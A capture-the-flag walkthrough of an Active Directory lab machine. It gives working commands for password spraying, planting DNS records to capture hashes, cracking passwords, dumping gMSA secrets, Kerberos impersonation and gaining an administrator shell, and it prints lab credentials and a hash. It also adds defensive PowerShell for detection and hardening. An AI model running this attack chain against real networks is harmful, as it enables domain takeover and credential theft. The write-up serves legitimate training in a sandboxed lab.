Enumeration
Nmap
From the Nmap scan, we can see that the target has various TCP ports open, including 53 (DNS), 80 (HTTP), 88 (Kerberos), 389 (LDAP), 445 (SMB), and 5985 (WinRM). It’s worth noting that the target is part of an Active Directory domain called intelligence.htb, and we can see a hostname for the domain controller as dc.intelligence.htb.
sudo nmap -sVC -Pn -T4 -p- 10.10.10.248
Added the host names to /etc/hosts so that they resolve to the machine's IP address:
10.10.10.248 intelligence.htb dc.intelligence.htb
SMB
Unable to connect with smbclient using null login.
smbclient -L 10.10.10.248 -N
HTTP
We can see a static web page by browsing the IIS web server at http://10.10.10.248/
In the Documents directory there are two PDF files that follow the same naming scheme, YYYY-MM-DD-upload.pdf.
Foothold
Using the following bash script we can download every PDF file named after a date from 2020-01-01 up to today:
# Print one candidate URL per day and fetch them 20 at a time; wget -q stays silent
# for dates that have no file on the server.
d="2020-01-01"
while [ "$d" != "$(date -I)" ]; do
    echo "http://10.10.10.248/Documents/$d-upload.pdf"
    d=$(date -I -d "$d + 1 day")
done | xargs -n 1 -P 20 wget -q
After running the script, several PDF files were downloaded.
Extracted the Creator metadata field of each PDF as a list of potential usernames and saved it to a file named userlist.
exiftool -Creator -csv *pdf | cut -d, -f2 | sort | uniq > userlist
Converted the PDF files to text files using pdftotext, then used head to display the first line of each text file.
for f in *pdf; do pdftotext "$f"; done
head -n1 *txt
We found two interesting files “New Account Guide” and “Internal IT Update”.
From the file 2020-06-04-upload.txt we can see a password: NewIntelligenceCorpUser9876
cat 2020-{06-04,12-30}-upload.txt
Using the bash script below, we can try to list the SMB shares of the target with every name in the user list and the obtained password.
#!/bin/bash
# Try the single known password against each user in userlist and report the names
# whose smbclient output shows neither a logon failure nor a locked-out account.
password="NewIntelligenceCorpUser9876"
target="\\10.10.10.248"
workgroup="intelligence.htb"
while read -r user; do
    output=$(smbclient -L "$target" -U "$user%$password" -W "$workgroup" 2>&1)
    if [[ ! $output =~ "NT_STATUS_LOGON_FAILURE" && ! $output =~ "NT_STATUS_ACCOUNT_LOCKED_OUT" ]]; then
        echo "[+] Successful login for: $user"
    fi
done < userlist
This script reads each user in the file userlist and tries to list shares with smbclient. It checks the output for the two status codes that indicate a failed or locked-out logon; if neither appears, it assumes the authentication succeeded and prints that user's name.
Running the script, we got a successful login as the user Tiffany.Molina.
Successfully listed the SMB shares and connected to the share Users as the user Tiffany.Molina.
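The loop above leaves a characteristic trace on the domain controller: one source address failing logons against many different accounts within a short window, which is unlike a user mistyping a single password. The following PowerShell function, added here as an example and not part of the original walkthrough, flags that pattern; the event objects and the two source addresses are constructed sample data.

```powershell
# Added example: group logon failures by source and report sources that tried at least
# $MinDistinctUsers different accounts within $WindowMinutes.
function Find-PasswordSpray {
    param(
        [Parameter(Mandatory)] [object[]] $Events,   # objects with TimeCreated, TargetUserName, IpAddress
        [int] $MinDistinctUsers = 5,
        [int] $WindowMinutes = 10
    )
    $Events | Group-Object IpAddress | ForEach-Object {
        $group = @($_.Group | Sort-Object TimeCreated)
        $users = @($group | Select-Object -ExpandProperty TargetUserName | Sort-Object -Unique)
        $span  = $group[-1].TimeCreated - $group[0].TimeCreated
        if ($users.Count -ge $MinDistinctUsers -and $span.TotalMinutes -le $WindowMinutes) {
            [pscustomobject]@{
                Source        = $_.Name
                DistinctUsers = $users.Count
                Attempts      = $group.Count
                FirstSeen     = $group[0].TimeCreated
                LastSeen      = $group[-1].TimeCreated
            }
        }
    }
}

# Constructed sample events (not real log data): 10.10.14.2 fails against seven accounts
# in 35 seconds and is reported; 10.10.10.50 fails twice against one account and is not.
$t0 = Get-Date '2021-07-03T10:00:00'
$sample = @(
    1..7 | ForEach-Object {
        [pscustomobject]@{ TimeCreated = $t0.AddSeconds(5 * $_); TargetUserName = "user$_"; IpAddress = '10.10.14.2' }
    }
) + @(
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(1); TargetUserName = 'user1'; IpAddress = '10.10.10.50' },
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(2); TargetUserName = 'user1'; IpAddress = '10.10.10.50' }
)

Find-PasswordSpray -Events $sample | Format-Table -AutoSize
```

On a domain controller the input can be built from Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} by mapping each event's TargetUserName and IpAddress fields onto the three properties the function expects.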
smbclient -L 10.10.10.248 -U Tiffany.Molina
smbclient \\\\10.10.10.248\\Users -U Tiffany.Molina
The user flag can be obtained from the directory: C:\Users\Tiffany.Molina\Desktop
Lateral Movement
From the share IT we can see a PowerShell script called downdetector.ps1.
smbclient \\\\10.10.10.248\\IT -U Tiffany.Molina
get downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
The script downdetector.ps1 loops through the DNS records of the zone and makes an authenticated request to every host whose name starts with "web" to verify its status. By default, authenticated users are allowed to create records in the Active Directory Integrated DNS (ADIDNS) zone, so we can add a record matching that pattern which points to our own IP address.
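The weakness is twofold: the set of hosts is taken from DNS records that any domain user can create, and the request carries the scheduled task's credentials. The block below is an added example, not the script from the box: part 1 lists the ACEs on the zone that grant the ability to create child objects (the default "Authenticated Users" grant is what the walkthrough uses), and part 2 is the same health check rewritten with a fixed allowlist and no credentials. The host names web01/web02 and the SMTP server name are assumptions.

```powershell
# Added example (not the original downdetector.ps1). Run on a domain-joined host with
# the ActiveDirectory module.
Import-Module ActiveDirectory

$zoneDn = 'AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb'

# Part 1: who may add records to the zone? Any broad principal here (for example
# "Authenticated Users") means every domain account can plant a "web*" record.
(Get-Acl $zoneDn).Access |
    Where-Object { $_.AccessControlType -eq 'Allow' -and
                   $_.ActiveDirectoryRights -match 'CreateChild|GenericAll|GenericWrite' } |
    Select-Object IdentityReference, ActiveDirectoryRights, IsInherited

# Part 2: hardened health check. Hosts come from a fixed allowlist (names assumed)
# instead of every "web*" DNS record, and the request is unauthenticated, so a rogue
# record receives nothing that could be captured or relayed.
$allowedHosts = @('web01.intelligence.htb', 'web02.intelligence.htb')

foreach ($hostName in $allowedHosts) {
    try {
        $response = Invoke-WebRequest -Uri "http://$hostName/" -UseBasicParsing -TimeoutSec 10
        $status   = [int]$response.StatusCode
    } catch {
        # Connection failures carry no response object; HTTP errors (4xx/5xx) do.
        $status = if ($_.Exception.Response) { [int]$_.Exception.Response.StatusCode } else { 0 }
    }
    if ($status -ne 200) {
        Send-MailMessage -From 'Ted.Graves@intelligence.htb' -To 'Ted.Graves@intelligence.htb' `
            -Subject "Host: $hostName is down (status $status)" -SmtpServer 'mail.intelligence.htb'
    }
}
```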
To achieve this, we can use the dnstool.py script provided by krbrelayx:
python dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.10.10.248 -a add -r web1 -d 10.10.14.2 -t A
Started Responder to intercept the request.
sudo responder -I tun0
Responder captured the password hash of the user Ted.Graves.
Copied the hash to a file hash.txt.
Using John the Ripper, successfully cracked the password: Mr.Teddy
john -w=/usr/share/wordlists/rockyou.txt hash.txt
Privilege Escalation
Using the credentials of the user Ted.Graves, we collected data from the domain with bloodhound-python.
bloodhound-python -ns 10.10.10.248 -d intelligence.htb -dc dc.intelligence.htb -u Ted.Graves -p Mr.Teddy
In BloodHound we marked the users Tiffany.Molina and Ted.Graves as owned, and the users svc_int and administrator as high-value targets.
Ted.Graves is a member of the ITSUPPORT group, which has ReadGMSAPassword rights over svc_int. In addition, svc_int is allowed to delegate to the Domain Controller.
Using the tool gMSADumper we can get the password hash of the service account svc_int.
python gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248
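The chain ITSUPPORT -> svc_int -> delegation to the DC is visible from the directory itself. The following function, added here as an example and not part of the walkthrough, lists every gMSA with the principals allowed to retrieve its managed password and its delegation settings, so group-wide password grants and protocol transition can be reviewed in one table; it requires the ActiveDirectory module on a domain-joined host.

```powershell
# Added example: audit gMSA password readers and delegation configuration.
Import-Module ActiveDirectory

function Get-GmsaExposureReport {
    $props = 'PrincipalsAllowedToRetrieveManagedPassword', 'msDS-AllowedToDelegateTo', 'TrustedToAuthForDelegation'
    Get-ADServiceAccount -Filter * -Properties $props | ForEach-Object {
        $gmsa = $_
        # Skip accounts with no reader configured (the attribute is then empty).
        foreach ($dn in @($gmsa.PrincipalsAllowedToRetrieveManagedPassword | Where-Object { $_ })) {
            $reader = Get-ADObject -Identity $dn
            [pscustomobject]@{
                ServiceAccount     = $gmsa.SamAccountName
                PasswordReader     = $reader.Name
                ReaderClass        = $reader.ObjectClass
                # Every member of a group reader can dump the password; review those first.
                GroupGrant         = ($reader.ObjectClass -eq 'group')
                DelegatesTo        = (@($gmsa.'msDS-AllowedToDelegateTo') -join ', ')
                # Protocol transition lets the account obtain service tickets on behalf
                # of any user without that user's credentials.
                ProtocolTransition = [bool]$gmsa.TrustedToAuthForDelegation
            }
        }
    }
}

Get-GmsaExposureReport | Sort-Object GroupGrant, ProtocolTransition -Descending | Format-Table -AutoSize
```

Rows where GroupGrant is true and DelegatesTo is non-empty describe exactly the situation found on this box: compromising any member of the reader group yields a service account that can act towards the listed services.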
To obtain a Kerberos ticket for the Administrator user, we must first synchronize our clock with the target host; otherwise the request fails with an error stating that the clock skew is too great. Kerberos is time-sensitive, and the Nmap scan showed a 7-hour difference between our host and the target.
To sync our clock with the target host, we first disable automatic time synchronization with timedatectl set-ntp 0, and then run sudo ntpdate -s intelligence.htb to perform the synchronization.
sudo timedatectl set-ntp 0
date && sudo ntpdate -s intelligence.htb && date
Successfully obtained a ticket as Administrator, saved to a file called Administrator.ccache:
python getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :87c12d4a0641b2b17fb5620cc2db2ca8
Got a shell as the user administrator with psexec using the acquired ticket.
export KRB5CCNAME=Administrator.ccache
psexec.py -dc-ip dc.intelligence.htb -k "intelligence.htb/Administrator@dc.intelligence.htb" -no-pass
The root flag can be obtained from the directory: C:\Users\Administrator\Desktop